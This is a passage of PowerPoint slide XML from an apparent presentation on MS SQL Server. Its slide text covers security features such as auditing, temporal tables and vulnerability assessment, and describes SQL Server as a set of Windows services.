          <a:lstStyle/>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961" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Auditing, Temporal tables</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="914049" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="1961" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Segoe UI"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>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961" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Vulnerability Assessment</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="50" name="Rectangle 49"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2496443" y="1676400"/>
            <a:ext cx="5262882" cy="2166053"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx2">
              <a:lumMod val="25000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx2">
                <a:lumMod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1" rIns="182750" bIns="146201" numCol="1" spcCol="0" rtlCol="0" fromWordArt="0" anchor="ctr" anchorCtr="0" forceAA="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>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961" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Maintain audit records of database activities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="914049" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="1961" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Segoe UI"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="914049" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1961" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Continuously assess and analyze security measures</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="1961" b="0" i="0" u="none" strike="noStrike" kern="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nvGrpSpPr>
          <p:cNvPr id="17" name="Group 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28319CD2-975E-4BC8-AD6C-3FC4F49CD011}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="20593720">
            <a:off x="10788549" y="2879118"/>
            <a:ext cx="647838" cy="522992"/>
            <a:chOff x="10738915" y="525462"/>
            <a:chExt cx="660922" cy="533555"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18" name="Explosion: 8 Points 17">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9EE81422-546A-45FD-82CB-38B4CE19BD35}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="10738915" y="525462"/>
              <a:ext cx="660922" cy="533555"/>
            </a:xfrm>
            <a:prstGeom prst="irregularSeal1">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1371"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 name="Rectangle 18">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B5BBC2D0-4D68-4C58-AE66-F0C53661D53C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10774710" y="632356"/>
              <a:ext cx="564453" cy="291841"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:sp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r>
                <a:rPr kumimoji="0" lang="en-US" sz="1371"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egoe UI Semilight"/>
                  <a:ea typeface="Segoe UI" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Segoe UI" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>new!</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6BF87192-7535-4ED8-97B7-E9A6291D04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072" y="4026533"/>
            <a:ext cx="4949326" cy="2701696"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{02D3AB3E-07EF-444E-B60C-690A2E94FA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2370" y="4026533"/>
            <a:ext cx="4296712" cy="2707407"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{599FCA90-D655-4C72-AB24-17835013CEBE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8533436" y="1113565"/>
            <a:ext cx="1716429" cy="56116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Technology</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{038E1DE0-BE55-4AF3-BDFA-707CFE9AE293}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3951151" y="1113565"/>
            <a:ext cx="1245915" cy="56116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1961" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="353535"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Process</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="91048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5979C-C84F-7F49-A11F-095405D3D739}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>Enterprise Grade Security that is Easy-to Use</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{245388CF-5AF4-3944-9238-F5E7500F556F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1274748"/>
            <a:ext cx="12192000" cy="5583252"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19627651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cs-CZ" dirty="0"/>
              <a:t>MSSQL Server Fundamentals</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Title 1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="641404" y="1079832"/>
            <a:ext cx="10972800" cy="484744"/>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170"/>
            <a:r>
              <a:rPr lang="en-US" sz="1867" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="03326C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>Service Description</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1867" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="009FE3"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="TextBox 26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="631877" y="1900979"/>
            <a:ext cx="10868016" cy="3829825"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rIns="192000" bIns="48000" numCol="1" spcCol="360000" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just" defTabSz="1219170"/>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>At </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>its</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>core</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>, MS SQL Server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>can</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>be</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>seen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t> as just </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>another</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>application</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>It</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>actually</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t> a set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>of</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t> Windows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>services</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>that</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t> run on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t> OS. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" defTabSz="1219170"/>
            <a:endParaRPr lang="cs-CZ" sz="1867" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="5C5C5C"/>
              </a:solidFill>
              <a:latin typeface="Signika Negative" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just" defTabSz="1219170"/>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>It</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>important</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>note</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>that</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>those</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t> Windows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>services</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t> run in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>context</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>of</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
